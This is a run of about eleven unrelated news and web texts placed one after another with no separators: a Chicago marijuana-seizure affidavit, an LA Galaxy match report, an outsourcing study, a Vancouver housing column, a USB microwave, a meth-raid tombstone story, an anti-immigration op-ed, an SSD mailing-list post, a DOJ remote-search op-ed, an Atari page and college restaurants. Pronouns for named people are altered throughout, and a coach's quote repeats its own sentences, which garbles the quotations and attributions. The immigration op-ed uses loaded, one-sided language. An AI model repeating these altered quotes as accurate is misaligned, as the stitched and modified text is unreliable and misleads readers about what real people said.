`` All seven were charged with conspiracy to possess and distribute marijuana in a criminal complaint filed today in U.S. District Court , '' stated a release from the federal prosecutor . `` They appeared this morning before U.S. Magistrate Judge Arlander Keys and remain in federal custody pending detention and preliminary hearings , which were scheduled for 2:30 p.m. next Tuesday . ''
`` This historic drug seizure represents law enforcement partnership and cooperation at their best , '' said Gary J. Hartwig , Special Agent-in-Charge of ICE Homeland Security Investigations . `` HSI and DEA agents , together with our state and local partners , removed nearly 11 tons of marijuana intended for our communities . ICE will continue identifying and dismantling criminal organizations that smuggle drugs across our borders and into our communities . ''
Jack Riley , Special Agent-in-Charge of the Chicago Field Division of the Drug Enforcement Administration said : `` The estimated $ 22 million dollars worth of marijuana seized in this joint investigation translates to a significant blow to the availability of marijuana in the region , as well as a denial of illicit proceeds back to those responsible for this shipment . ''
In a similar case involving marijuana shipped from Mexico to Chicago , last summer Cook County sheriffs deputies intercepted a pot shipment totaling 5525 pounds that was thought to be one of the largest ever in the area . At the time , authorities put the value of that much smaller quantity at $ 20 million . Federal agents today said that the difference in the street value could have been a result of the quality of the illicit product .
According to a 74-page affidavit by an HSI special agent : `` On Nov. 17 , CBP officers in Eagle Pass , Tex. , discovered that a Union Pacific train bound for Chicago Heights was carrying approximately 21,800 pounds of suspected marijuana . CBP officers observed a number of large bundled packages , referred to as `` super sacks , '' in six cars on the train . A CBP canine alerted officers to the presence of narcotics in the train cars near several of the super sacks . CBP officers then opened a super sack and observed 13 cubic bundles , which were encrusted in a thick layer of fine red masonry pigment dust . CBP officers broke open several of these cubic bundles and observed a green leafy substance , which field tested positive for the presence of marijuana . In total , CBP officers observed that approximately 109 super sacks in the train cars contained cubic bundles comprised of a green leafy substance . Officers weighed 13 of the cubic bundles from one super sack and determined that they weighed approximately 200 pounds .
The bill of lading associated with these cars stated that they contained 58 super sacks in each train car , or a total of approximately 340 super sacks . The shipping documents stated that the super sacks contained packages listed as `` TITANIUM PIGMENTS OR . '' The documents further stated that the train cars were loaded and sent by a company called Comercializadora De Minerale , located in Jalisco , Mexico , and were being imported by a company called Earth Minerals Corp. , in Rockdale , just south of Joliet .
CBP officers contacted HSI special agents for further investigation . The HSI agents then placed the suspected marijuana back into the rail cars and sealed them . The rail cars were then placed back into the normal course of commerce , and with the railroad 's cooperation , HSI and DEA agents surveilled the train cars as they traveled to a storage warehouse in the 1200 block of S. State Road , in Chicago Heights , with rail access .
One defendant , identified as Carlos Osvaldo Quintero , allegedly spoke to a Union Pacific employee on multiple occasions to coordinate the delivery of the train cars to the warehouse . From Dec. 6 through 10 , the rail cars were unloaded by individuals who used forklifts to move large bundled packages containing marijuana from inside the cars to a storage facility located approximately 50 yards from the initial warehouse .
On several occasions on Nov. 17 and 18 , CBP officers spoke with a customs broker who works in Eagle Pass , Tex . The broker stated that they had been hired by Earth Minerals , and that a man identifying themselves as `` Miguel Dominguez '' had called them multiple times on Nov. 17 to inquire about the whereabouts and estimated arrival date for the rail cars . Further investigation yielded no public records of any businesses named Chicago Earth Minerals Corp. or Earth Minerals Corp. in Illinois .
On Dec. 1 , agents arranged for the delivery of a test train car , believed to be carrying no marijuana , to the Chicago Heights warehouse premises . The gate to the premises was locked and the test rail car was parked outside overnight . The next morning , agents observed an individual identified as `` Carlos Gomez '' and three unidentified men arrive at the premises . Gomez and the others were observed pushing the test car inside of the warehouse premises , using a mechanical device . Later that day , agents observed Gomez and the others use a forklift to move cargo from the test car onto pallets . Using aerial surveillance , agents further observed the pallets being loaded onto a semi-tractor trailer , with a flatbed .
On Dec. 6 , agents caused the six interdicted rail cars to be delivered to train tracks adjoining the Chicago Heights warehouse . Agents observed several individuals arrive at the site and watched as the individuals moved one of the rail cars inside of the warehouse premises , using a mechanical device . Throughout last week , HSI and DEA agents , using court-authorized video recording inside the facility and aerial surveillance , observed individuals unloading the large super sacks from the rail cars , and specifically observed the following pattern of activity : approximately four individuals used forklifts to unload super sacks from one of the rail cars that was parked inside of the site ; the individuals loaded the majority of the super sacks from the rail cars onto a flatbed semi-truck . Once the flatbed was filled with super sacks , the truck was driven approximately 50 yards to an smaller storage facility located just to the west ; and the individuals then used a forklift to unload the super sacks from the flatbed , and moved them inside of the warehouse where they were stored until yesterday . Between Dec. 7-10 , the process was repeated of unloading the super sacks from the six rail cars and moving them to the warehouse .
Agents maintained constant surveillance and did not observe any marijuana being removed from the storage facility . Between Dec. 6 and 15 , agents used court-authorized wiretaps to intercept numerous telephone conversations in which Carlos Osvaldo Quintero and others allegedly discussed unloading , transporting and distributing the marijuana . ''
The LA Galaxy may have just added some momentum to a late-season run with Giovani dos Santos providing the firepower and Landon Donovan providing the theater . Dos Santos scored two goals and added another two assists in a 4-2 performance for Los Angeles in what is shaping up to be a strong season for the sometimes invisible playmaker .
With multiple games played in the last week , Bruce Arena looked to a midfield of “ youngsters ” to matchup against Orlando City on Sunday afternoon in Carson . Raul Mendiola , Rafa Garcia , Sebastian Lletget and Emmanuel Boateng all got starts . Moving players like Baggio Husidic and Jeff Larentowicz to the bench for some rest .
Another familiar face , Jelle Van Damme , started their first game since injury forced them out of the LA Galaxy 's match with Vancouver on August 27th . And Robbie Keane and Landon Donovan both sat on LA 's bench awaiting Bruce 's call .
The rest of the lineup , save perhaps Alan Gordon as the lone striker , was as expected . And Giovani dos Santos would once again get to roam the center of the field looking for opportunities to go forward .
However , things would not go as planned for the Galaxy . Despite dominating possession and early chances , they were unable to find a goal right away . And thanks to a lapse in judgment by the right side of the Galaxy 's defense , Orlando found the opening goal in the 20th minute when Kevin Molino punched a rebound back into the goal past Jelle Van Damme and Brian Rowe . It was a play that very well could 've been offside , but was n't flagged as such . And it was a play that should 've seen a better effort on defense .
Apparently , this was the wake-up call the LA Galaxy needed . Dos Santos was first on the scoresheet in the 35th minute when Brian Rowe distributed the ball quickly from their penalty box to Jelle Van Damme . Van Damme looked quickly upfield to see a streaking Ema Boateng . With Van Damme 's pass secured Boateng raced down the left-hand side , occasionally tucking in , so they could find some room to make a wonderful cross to-Dos Santos who was trailing the play . Gio easily passed the ball into the back of the net for the equalizer .
“ He 's doing very well . This was a little bit of an issue , but I think he 's now a year into playing on a full time basis . As heralded as they were and is , they have not played on a regular basis in their club careers . Now he 's a year in and this season is probably the fullest season he 's had in their career . And now he 's a year in . This season is probably the fullest season he 's had in their career . And you can see that he 's now getting fitter , getting more experienced , understanding this league and understanding the things that they need to do to make themselves a better player and also make our team a better team . And you can see that happening . They have 14 goals now . For that position , that 's pretty good . In that position , strikers usually score that many goals and he 's not a striker . It 's pretty good stuff. ” Bruce Arena , LA Galaxy Head Coach
Just three minutes later , off a rejected corner kick , Dos Santos would again be involved in a scoring play . Boateng held the Dos Santos corner into the offensive zone before passing it left . Giovani dos Santos made a quick little pass inside to Van Damme , who put a rocket of a cross towards Alan Gordon . Gordon used all of their body to push the ball into the goal , score their 50th MLS goal , and flip the game on its head with the Galaxy now leading 2-1 .
Gordon and Dos Santos would pair up again , just before halftime . With all the momentum leading towards the LA Galaxy , Dos Santos played Gordon into space behind Orlando 's backline . José Aja came charging over towards Gordon and fouled them near the top of the penalty box . Gordon pulled up the landing gear and went down forcing referee Ismail Elfath to make a decision . Elfath pointed to the penalty spot and issued Aja a yellow card , although replays clearly showed the contact outside the box . The break went LA 's way and Giovani dos Santos stepped up to bury their 2nd goal of the night , sending Orlando ‘ keeper Joe Bendik the other way . Before the half , it was 3-1 and the Galaxy were dominating .
They would add a fourth goal as Robbie Keane , who entered for Alan Gordon in the 60th minute — Keane 's first game action since the LA Galaxy 's 1-0 defeat to New York City FC back on August 20th ( Keane missed a total of 4 games during this injury and international absence ) , scored a goal that was once again , assisted by Giovani dos Santos and Sebastian Lletget . It was a pinpoint pass by Lletget that caught Orlando flatfooted and saw both Dos Santos and Keane running towards net . A simple first touch to Keane , around a charging Bendik , gave Robbie Keane an open look and an easy finish .
And the scoreline , now 4-1 , would be the perfect situation to bring in , the much anticipated , Landon Donovan . Donovan entered for Raul Mendiola in the 82nd minute to a loud ovation . And while they struggled to match the pace of the match 's final minutes , it was an important step if the LA is to realize any benefit from Donovan 's return .
The Galaxy would only be marred by one more blemish on the night . And that was the stoppage time goal that saw Brek Shea score for Orlando to bring the final score just a bit closer , but still out of reach . It is the third stoppage time goal that LA has allowed in its last three games and it continues to be a reason for concern headed down the stretch and into the playoffs .
Dos Santos would finish the game with two goals and two assists leaving them with 14 goals and 11 assists in 2016 . And for a player who 's been largely absent for long stretches during the season , it was good for LA to see them coming to life at the right time .
The LA Galaxy will next travel to take on Sporting KC on Sunday , September 18th at 11AM Pacific . That game will be broadcast on FOX .
MAN OF THE MATCH
This was one of the toughest decisions of the year in terms of who stood out . Giovani Dos Santos had the numbers , Jelle Van Damme had some playmaking and Rafael Garcia was like a wet blanket on Kaka all night . And some might even give Landon Donovan the nod because the atmosphere was certainly electric and the crowd came to see him .
But in a nod to their work rate over the last two or three games , and with the numbers to back it up , Dos Santos is our guy once again for the LA Galaxy .
He 's been able to play in their position , with Robbie Keane still coming back from injury , and that has made all the difference . They have seven goals in their last seven games and has been racking up the assists as well — three assists in their last three games . But their work on the defensive side of the ball , and their hustle may have them on the cusp of an MVP race . Although in my book , there 's only one Gio who can win that race ( Sebastian Giovinco ) .
“ I feel like I am in the best moment of my career , I 've never felt this way . I feel very good , my finish is good . The team is doing good so I feel great right now. ” Giovani dos Santos , LA Galaxy Midfielder
But do n't overlook the playmaking of Jelle Van Damme on the night . The Galaxy have missed their dominance on defense and their help on both offensive and defensive set pieces . But he 's a leader as well , and the Galaxy play better when he 's on the field . He 's most likely the team MVP , so seeing them come out of this game to continue their recovery was a good thing .
“ I used to be a striker when I was young , so maybe that 's the thing that keeps me going forward . I like going forward when I can . In the last five years on my old team , I played as a fullback and that was very offensive . Once in a while , you like going up front . Bruce tells me to pick my moments , and that 's what I try to do. ” Jelle Van Damme , LA Galaxy Defender
And almost no one will highlight him , but Rafa Garcia was tasked with shutting down a world-class player on Sunday afternoon . And they executed that gameplan to perfection . Everywhere Kaka went , so did Garcia . The chippy fouls and the constant contact forced Kaka out of their rhythm and in turn Orlando out of theirs . They played a game that coaches and players will cheer , but fans will rarely recognize . But Garcia did what needed to be done and they executed it to perfection .
QUOTE OF THE MATCH
Bruce Arena on the play of their over thirty players :
“ Two goals from guys over 30…is there a rule against that ? Manchester United has a pretty good striker that 's about 35-36 years old . This age stuff is kind of stupid I think . To a certain degree , you 've got to understand there are some issues associated with older players in professional sports . You see it all the time , but at the club level in soccer it can be done . It 's done all the time . I can probably name a dozen players of high quality…easily a dozen players of high quality in their thirties and some that are in their mid-thirties . You do n't want to field a complete team of players of those ages , but I do n't think we spend a whole lot of time thinking about that , although it is a point of consideration for sure . ”
LANDON DONOVAN
It was the perfect scoreline for Donovan to get their 12 minutes of play . But it was also completely unnecessary from a play standpoint . There are only two reasons why playing Donovan , a man who has n't played a competitive match for 21 months , and who has n't been training with the Galaxy for more than a few days , was a good idea .
First , they needed to understand how much quicker the game is played when you 're not on the training field . And they needed to understand that game pace is something they do n't have right now . That 's good for them and the score allowed that learning lesson .
Second , from the Public Relations standpoint , it was good to parade them in front of the crowd , let them wave , let people cheer and now not feel any pressure to play them again . Because their contribution to this team is going to be about how quickly they can get up to speed and how quickly their fitness returns . Because the man who was introduced onto the field in the 82nd minute does not have that opportunity if the Galaxy were tied or needed a goal . It 's that simple .
“ Did you watch me play ? I need to get fit . I came into a game where both teams were exhausted and I was the slowest player on the field . So I need to get myself ready to compete in a real way . Bruce and the coaching staff need to know that when they put me in , it can mean something . So tonight worked out well . But I need to be able to contribute. ” Landon Donovan , LA Galaxy Striker
Patience will be key , and getting LD minutes should not be high on Arena 's priority list . It 's going to be a balance of situations and scorelines .
SCORING SUMMARY
ORL – Kevin Molino 20 '
LA – Giovani dos Santos ( Assisted by Emmanuel Boateng , Jelle Van Damme ) 35 '
LA – Alan Gordon ( Assisted by Jelle Van Damme , Giovani dos Santos ) 38 '
LA – Giovani dos Santos ( penalty ) 45 '
LA – Robbie Keane ( Assisted by Giovani dos Santos , Sebastian Lletget ) 70 '
ORL – Brek Shea 90'+2
HIGHLIGHTS
Comments
comments
Anyone who has exchanged stories about atrocious technical support calls will no doubt be aware of the horror stories that come from people who were shunted to a foreign call center where a person with an impenetrable accent proved incapable of providing anything resembling support . There are some pretty significant economic issues behind these anecdotes , though , as it 's not clear whether the poor service is truly turning away customers or if the reduced costs are being passed on to buyers at a rate that draws more in . A new study takes a look at precisely these issues , and concludes that companies that outsource customer service can wind up doing themselves more harm than good .
The study has been placed online for comment prior to publication by its authors , who are looking for feedback from their fellow economists . It was enabled by a truly heroic effort by one of the authors , who scanned over 50,000 news reports over an eight-year period in order to gain a fairly comprehensive view of which Fortune 500 companies in the US were engaging in some form of outsourcing ( they found 150 of them had ) . The authors recognize that this dataset is n't complete , but an Indian trade industry group was able to verify about 80 percent of the reports , suggesting it 's reasonably accurate and comprehensive .
The authors then determined how consumers ' views of that company might be changing as a result of the outsourcing . They divided the services sent out of the company based on whether they were front office ( which would include support calls ) or back-office services , such as in-house IT support . Various measures of consumer satisfaction were obtained from the National Quality Research Center . Measurements analyzed included customer satisfaction , loyalty , consumer expectations , and perceived value of products and services . The authors included adjustments for the industry involved and the year involved , as various measures tend to increase with time .
Overall , the analysis indicates that offshoring back-office services has no effect on most measures of customer contentment . Oddly , it actually appears to raise customer loyalty slightly , although the marginal statistical significance makes that determination somewhat suspect .
Things were far more clear in the case of front office services , and the news was uniformly bad for the companies that do so . Measures of customer satisfaction , customer loyalty , perceived quality , and customer expectations all dropped when companies outsourced . Although impenetrable accents are the stuff of bad tech support legend , they are n't the root cause of this problem , as these negative perceptions held even when companies outsourced their front office work to a company located in the US . The authors suggest this can , in part , be explained by the lack of specialized expertise in those providing customer support .
Ostensibly , the potential payoff is that saved costs will be passed on to consumers , which will allow them to perceive the company as providing better value . The reality is that there was no correlation between outsourcing and perceived value ; the authors suggest the companies are simply using the savings to increase their profits instead . As a result , from the consumer 's perspective , outsourcing is a complete negative .
Should companies care ? The authors note that they make use of one measure of overall customer satisfaction , the American Customer Satisfaction Index™ , which has significant implications for a company . `` Higher ACSI scores , '' they write , `` have been linked to higher firm profitability , shareholder value and risk-adjusted stock returns . '' In essence , by reducing customer satisfaction without offering anything in return , companies that have handled outsourcing poorly ( which appear to be in the majority ) may be shooting themselves in their collective feet .
EDMONTON - It 's a peachy time to be a homeowner in Metro Vancouver .
Actually , it 's almost always a peachy time to be a homeowner in Canada 's stunningly beautiful west coast metropolis .
With billions of dollars in foreign cash sloshing through the local economy , much of its illicit cash from mainland China , house prices are on fire , as they have been for most of the past 15 years .
Over the past 12 months , the price of a typical single-detached home in Vancouver and neighbouring suburbs like Burnaby , Richmond and West Vancouver has soared by more than $ 122,000 , to nearly $ 1.08 million .
Got that ? Homeowners in Metro Vancouver saw the value of their detached properties jump by roughly $ 2,350 per week over the past 12 months . That 's more than twice the size of the average Albertan 's weekly paycheque .
So while sipping their Chardonnay and gazing out at the North Shore mountains , Vancouver homeowners pocketed more than 95 per cent of all working Canadians last year , before showing up for a single day at the office .
Now that has to influence the way one sees the world , do n't you think . Really , who needs industry when you live in a picture-perfect , post-industrial city where bank accounts grow fatter by the week , all on their own ?
More to the point , it helps explain why residents of the Lower Mainland are so wary of oil pipelines , specifically Kinder Morgan 's proposed $ 5.4 billion TransMountain pipeline expansion between Edmonton and Burnaby .
Alberta 's energy industry and the Harper government have waged a multi-year campaign to get new oil pipelines to the west coast . It 's a losing proposition , and I fully expect Alberta 's new Premier-designate Rachel Notley to run into the same roadblocks as their predecessors .
Why would Vancouverites risk an oil spill in Burrard Inlet or English Bay , one that could soil the city 's beaches for years and drive a stake through the city 's sizzling property market ? It makes no economic sense .
While much of the opposition to bitumen pipelines has focused on environmental issues , notably the costs and complexities of cleaning up a major spill , the key underlying reason for many Vancouverites ' opposition is less high-minded .
It 's really all about the money .
Through geographic and macroeconomic good fortune , Vancouverites have been blessed with one of the world 's juiciest , most generous ATM machines , and they 're not about to jeopardize it .
Who can blame them ? Over the past 10 years , the price of a typical single-detached home in Metro Vancouver has more than doubled . Over the past 15 years , it has more than tripled .
Except for brief pullbacks in 2009 and 2013 , prices have known only one direction : up . Put differently , owners of single detached homes in Lotus Land have seen their properties jump in value by an average of nearly $ 50,000 per year since 2000 .
When is the last time you had a $ 50,000 annual bonus ? Not lately , I suspect .
Explanations for Vancouver 's lofty real estate prices vary , but one thing is clear : vast sums of money from mainland China have played a big role in driving prices up , especially in high-end neighbourhoods .
The average detached house price in the City of Vancouver is now roughly $ 1.4 million . For many west-side neighbourhoods , it 's above $ 2 million .
Heinz creates world 's smallest microwave ( and you can plug it into your laptop )
It is the world 's smallest , portable microwave and can be powered via a link to the USB port on a laptop computer .
The turquoise device -called the Beanzawave - has been created in partnership with Heinz to allow workers tied to their desks to create a warm snack , or hot drink , to see them through the day .
However , it might also sustain a hard-working student through the many hours of lonely revision .
Heinz has come up with a novel device that will heat up food at the desk of busy workers
And the convenience of powering it from a laptop computer means you could tuck into a hot snack while flying on holiday or even on the train .
To date , the device , which stands just 7.4inches tall by 6.2in wide and 5.9in deep , is only a prototype .
However , experts at the Microwave Association insist the sophisticated miniaturised technology does exist to turn the eye-catching gadget into a reality .
The mini-micro has been designed by microwave expert Gordon Andrews and Stephen Frazer , an authority on industrial design and managng director of Frazer Designers .
Apart from its size , the key breakthrough is the use of a combination of mobile phone radio frequencies to create the heat to cook both on the outside and within in under a minute .
Mr Andrews , the managing director of GAMA Microwave Technology , said it is possible to 'tune ' the radio-frequencies to provide the best results with any small product .
'It is possible to heat a pie , a burger , a cup of soup or tea in quick time , ' they said .
'There is the option of powering it with lithium-ion batteries that would make it completely portable , which would be a help to fishermen , campers or sportsmen . '
Mr Andrews said they created the oven after being approached for help by Heinz , who wanted a portable microwave that would work with its Snap Pots .
The Beanzawave is powered from a USB cable plugged into a computer
The main drawback , with component prices at current levels , is the fact that the mini-micro would carry a hefty price of around £100 .
However , just as mobile phones have become cheaper , so the cost of production could fall to the point where it becomes profitable to manufacture on a large scale .
Mr Andrews said the product conforms with all the safety standards of a normal microwave oven , including protective walls and a door mechanism which kills the power when it opens .
Heinz claims there is a ready market for the ovens . Its research found 69 per cent of office workers find they are so busy at their terminals that they do not have a chance to go out for lunch every day .
Heinz Beanz marketing manager , John Alderman , said : 'Heinz Beanz and Hoops Snap Pots are one of the most innovative and successful new product launches in this category for the last two years , boasting sales of over £22million .
'They were designed in response to the changing eating habits of Brits , who require a quick solution to mealtimes , a trend which is even more relevant in today 's environment .
'The single serve microwavable Snap Pots allow people to quickly heat and eat . We are therefore delighted to be working with Gordon as the Beanzawave is the perfect partner to Heinz Snap Pots , allowing a nutritious snack to be whipped up anywhere in just 60 seconds . '
Heinz said that any decision on whether to support production will depend on the feedback it receives from the public .
Updated at 3:09 p.m . ET
LOMA LINDA , Calif. - Authorities said Wednesday that narcotics investigators raiding a Southern California home during a methamphetamine bust found something odd in the backyard  two dozen granite and marble tombstones .
One of the stolen grave markers was traced to the nearby Montecito Memorial Park in Colton , about 50 miles east of Los Angeles , said San Bernardino County sheriff 's spokesperson Cynthia Bachman .
`` Some of them may be from other cemeteries , '' they said . Investigators were trying to locate family members so the markers can be returned to the proper place in graveyards .
The 24 tombstones scattered around the site of Tuesday 's drug bust have an estimated value of $ 48,000 , they said .
Deputies said the suspects were selling methamphetamines from the residence . While in the backyard during the raid , deputies noticed tombstones weighing hundreds of pounds each .
`` The strange thing is , they do n't have any value to these suspects , '' Bachman said . `` They are made of stone . Sure , they have sentimental value to the families , but they are worth nothing to these people . ''
During the raid at Loma Linda home , deputies served a search warrant and arrested a resident . John Bleuer was booked for investigation of methamphetamine possession and sales , possession of firearms and possession of stolen property .
Three other residents identified in the warrant  Steve Hansen , Lisa Jackson and Louis Anchelowitz  were n't home at the time of the raid and were n't in custody on Wednesday , Bachman said . All four are expected to be charged and arraigned on Thursday .
The Montecito cemetery , built in 1927 , is operated by Houston-based Service Corporation International . A Montecito cemetery receptionist referred callers to the SCI press office , which did n't immediately return telephone messages .
Seems like the big boys in government and business and their ethnic auxiliaries have settled in on a multiplicity of efforts to make life for us average US citizens as complex and ugly as possible .
Ok , we have the IRS St Louis cabal , the AP reporters ' leakage tappings and the Snowden Washington Post and Guardian revelations of how massively our personal data has been routinely swallowed by the National Security Agency ( NSA ) .
But the main attack , which has yet to be fully understood by too many US citizens , came to fuller flower on Tuesday June 11 in the US Senate where the Gang of Eight 's massive enforcement-challenged Amnesty/ Immigration Surge bill , S.744 , has now been passed for debate .
Naturally , Silicon Valley has signed onto this Open Border blitz to get more cheap Asian engineers . It has been publicized , but not widely enough , that FaceBook founder Mark Zuckerberg is funding a massive advertising effort to gain approval for S.744 via a new entity called FWD.US . Does FWD mean FORWARD ? Not for a majority of Americans !
Note that most of these top tech companies have stored up billions in overseas profits—which presently they are loath to repatriate until , as Apple CEO Tim Cook recently told a Senate hearing , the tax cost of bringing home the money is less .
Here are a clutch of billionaires panning for more cheap foreign engineers in a huge stream of mostly very uneducated legal and illegal immigrants , while 14 % of American citizens are unemployed , underemployed or simply stopped looking for work .
Do n't hire and pay Americans—just import more aliens at lower wages and claim we need another Amnesty like 1986 , with no enforcement safeguards , thus putting more pressure for lower wages for all US citizens .
Not a very attractive package for us ordinary Americans , but apparently none of these billionaires are rich enough to be patriots !
And Rubio apparently thinks their Presidential chances will benefit from their love affair with S.744 . Maybe with the donors .
Fortunately , as the Huffington Post 's Elise Foley reported on June 10th ,
A few Republicans have announced opposition to the bill in its entirety . Sen. Jeff Sessions ( R-Ala. ) has railed repeatedly against the bill on the Senate floor during the first two days of debate . Sen. Mike Lee ( R-Utah ) , originally courted to be a member of the gang of eight , will vote against the bill even if it 's amended . '' `` From my perspective , there is no one amendment that can fix this bill , '' Lee said . `` Indeed , there is no series of tinkering changes that will turn this mess of a bill into the reform the country needs and that Americans deserve . '' Senate Begins Immigration Debate With Threats To Take Down Bill
I particularly liked Barron 's Randall Forsyth 's comment on the NSA eavesdropping in the `` Up and Down Wall Street '' column that they have just inherited from my long-time favorite , the late Alan Abelson :
Could there be a more apt commemoration of the publication of 1984 than the revelations of the National Security Agency 's snooping on phone and Internet activity ? ... Sun Microsystems founder once famously declared '' `` You have zero privacy anyway . Get over it . '' Big Brother Meets Big Data , June 8 2013
We have no privacy—but illegal aliens do .
My point : as we have known for years , we could know exactly who is in our country , legally and illegally . The technology is there , and being used—against us . But our government 's failure of will keeps vital tools such as E Verify from being made permanent and mandatory for employers .
I guess the NSA 's electronic probing must know by now all about my criminal record , which involves speeding violations and parking tickets .
Mea culpa ! But if I were an illegal alien , I would n't have to worry .
Donald A. Collins [ email him ] , is a freelance writer living in Washington DC and a former long time member of the board of FAIR , the Federation for American Immigration Reform . Their views are their own .
On Wed , Jul 11 , 2012 at 7:27 AM , David Brown < david.brown @ xxxxxxxxxxxx < mailto : david.brown @ xxxxxxxxxxxx > > wrote : The big question here is /why/ would you want TRIM support ? In many circumstances it leads to slower operations , and for SSDs from the past couple of years it is almost entirely superseded by the SSD 's own garbage collection . Are you speaking from a general usage standpoint , or from a TRIM + RAID standpoint ? For the general usage case , I was under the impression that SSD garbage collection was hamstrung by insufficient knowledge about which blocks are and are not in use . E.g . when a filesystem deletes a large file simply by marking it as deleted in the filetable/inode/whatever that particular system uses , the SSD is forced to carry around ( and re-copy , if necessary ) the data blocks until the filesystem tells it those blocks are no longer in use ( i.e . a TRIM command ) .
The Justice Department is seeking an amendment proposal that will give the federal government express power to locate and hack into the computers of anyone suspected of criminal activity . However , many organizations , including Google and the American Civil Liberties Union , are concerned that the broad language of the proposal leaves potential for Fourth Amendment violations .
Federal Prosecutors claim that this revision to the Federal Rules of Criminal Procedure has become necessary now that crime can be committed and concealed on the internet under a veil of anonymity and masked location . But in a memo responding to the concerns civil libertarians have raised , the DOJ makes clear that this amendment is seeking statutory legitimacy for practices the federal government is already engaging in practices that are arguably in direct violation of the Fourth Amendment .
The proposal to amend Rule 41 of the federal rules of criminal procedure fails to guarantee the privacy of those who are not under investigation but who have had access to the same computer as the target of a remote warrant . The DOJ claims that this omission is a non-issue because the federal government already overlooks the reasonable right to privacy provided by the Constitution .
“ When the government executes a Rule 41 warrant in the physical world , it is not obliged to provide notice to everyone with a potential privacy interest in the place searched , ” the recent memo reads .
The DOJ offers its assurances that this rule change wo n't violate the Fourth Amendment or increase the potential for privacy infringements by the federal government . Why ? Because executing remote search warrants on property with an unknown location is an exercise already practiced by the federal government .
“ A number of magistrate judges have issued warrants for remote searches , and those judges have been satisfied that the warrants fulfilled the requirements of the Fourth Amendment , ” the DOJ memo reads .
When caught collecting the Associated Press ' phone records in 2013 , the DOJ had similar defenses , claiming that they were following the law and internal rules . Given the department 's reputation for lawlessness , one can not help but consider : If the legal precedence for remote warrants is in place , why would the federal government need to push for this proposed amendment ?
Much of the resistance this proposal is receiving from privacy groups is over the broad language of the amendment , which makes it unclear precisely what information the government could access .
Alan Butler , senior counsel at the Electronic Privacy Information Center has inquired “ What procedural protections are going to be in place when you do these types of searches ? How are they going to be limited ? ”
The Justice Department admits that this proposal , if enacted , will not be subject to oversight . “ Currently , the remote searches that would be applied for under the amended rule are not subject to mandatory internal regulation at the Department , ” the recent memo reads .
If there are no internal checks when executing these new warrants , what reason is there to trust that the Justice Department will act within the bounds of the law ? When the DOJ refuses to lay out the scope of power that this proposal will give the government , the natural concern is that these techniques will be used with more frequency — especially when considering the department 's history with dubious tactics .
The memo issued by the DOJ states that federal courts have upheld that remote search warrants in the absence of a known location are constitutional . The memo maintains that this amendment proposal does not violate the particularity requirements of the Fourth Amendment or alter the process the federal government must follow in executing warrants .
So , just to clarify : The federal government is already executing remote search warrants in the absence of a known location without any regulation , and the reason this action does not violate the Fourth Amendment is because it is already being done ?
An obvious push to increase the government 's powers to tap , record , and monitor our communication , this proposal appears to be just another way to erode the Constitutional protections the DOJ is already ignoring .
Crissy Brown is a political commentator and a grassroots organizer in the Chicagoland area .
Daves Old Computers - Atari 8-BIT
Atari - makers of arcade video game machines , then home video game consoles also had a line of home computers . Drawing from their lineage in video game systems , the Atari 8-bit machines supported color graphics and joystick inputs , and many games were available for them .
Click any photo to view a large high-resolution image .
Original Atari
Atari 's first home computer the `` Atari 400 '' like many other vendor 's first entries suffered from a cheap/poor keyboard . Aside from that it was a reliable machine , although primarily a `` video game console with a keyboard '' .
Views : Main unit , Back , Side , Bottom , , Inside , Aftermarket Keyboard .
The `` Atari 800 '' is a bigger more serious home computer . It featured more memory , a better keyboard and two cartridge slots .
Donated by the Brantford PC Museum .
Views : Front showing open cartridge door , Side showing connectors .
XL series
The Atari 600XL and 800XL were replacements for the earlier 400 and 800 machines , and featured improvements such as full sized typewriter keyboard , and BASIC in ROM . The 600XL never really caught on , as it was fairly limited by it 's 16k RAM , however the 800XL was a capable computer for the time .
Clockwise from top left :
600XL power supply . Atari Joysticks . 800XL power supply , with tape/disk supplies stacked on top . 1050 disk drive and two 1010 tape drives . Atari 600XL , Various software cartridges . XM301 modem , video cables , Atari RF switch cable .
Center : Atari 800XL . Small blue adapter is parallel printer cable . Front : Atari peripheral cable .
Closeup view of 600XL and 800XL front panel/keyboard .
Atari 600XL/800XL rear panels . Left to right :
Peripheral connector , Parallel expansion bus ( covered ) , Direct video output ( 800XL only ) , RF video output , RF channel select , Power supply connection , Power switch .
Still useful as an Atari `` game consoles '' , there are connections for two joysticks on the right side .
Information label on bottom of 600XL .
Peripherals
A pair of Atari 1010 Cassette tape drive units . Although these have the same model number , and appear identical at first glance , they are not - look carefully at the placement of Stop/Eject and Pause buttons .
Rear view of the 1010 Cassette tape drives . Two peripheral connectors allow for daisy-chaining multiple devices .
Atari 1050 floppy disk drive . This drive connects to the Atari over a 19200 bps serial peripheral bus .
Rear view of 1050 diskette drive .
Atari documents :
Top : Computer Tutor , Atari BASIC source boot , Basic XE , Easy guide to Atari , Paperclip .
Center : Editor/Assembler , 800XL manual , Pascal , Atari BASIC reference guide .
Bottom : Inside Atari DOS , Your Atari Computer , Atari graphics & game design , Atari Playground .
These quick-serve restaurants are located in ideal demographic markets on college campuses , which means they 're bringing in big revenue—sometimes well after midnight . But late-night pizza is just the beginning .
Find Out Who Made Our List of America 's 10 Essential Full-Service College Restaurants
From subs to ice cream sandwiches to barbecue , it 's clear what the students crave : quality , accessible , and customizable food in a fun atmosphere . Here are some of the most successful quick-serve restaurants on college campuses across the country .
Buckeye Donuts
Ohio State University
When Buckeyes are craving fried confections—be it in the morning , before a game , or after a night out at the bars—they know where to turn . This 24/7 shop is even open on Christmas Day , and it 's been that way since 1969 . There are 31 varieties of donuts , but the namesake Buckeye Donut is the obvious favorite . Like the dessert with the same name , this donut features peanut butter and chocolate with a cream center . If you do n't have a sweet tooth , you wo n't walk away empty-handed : this donut shop also serves up gyros and fries at student-friendly prices .
Collegetown Bagels
Cornell University
See those CTB stickers on laptops or water bottles at Cornell ? This is what it stands for . Since 1976 , students in Ithaca , New York , have been indulging in bagels and bialys at Collegetown Bagels . The affordable student hangout bakes its bagels fresh daily and features sandwiches that fit perfectly into the college kid budget . While bagels bookend most of the ingredients , you can find wraps , paninis , and traditional sandwiches as well . But let 's face it : students come for the bagels . Favorites include the Round House breakfast sandwich , served on a rosemary salted bagel with hash browns .
Diddy Riese Cookies
UCLA
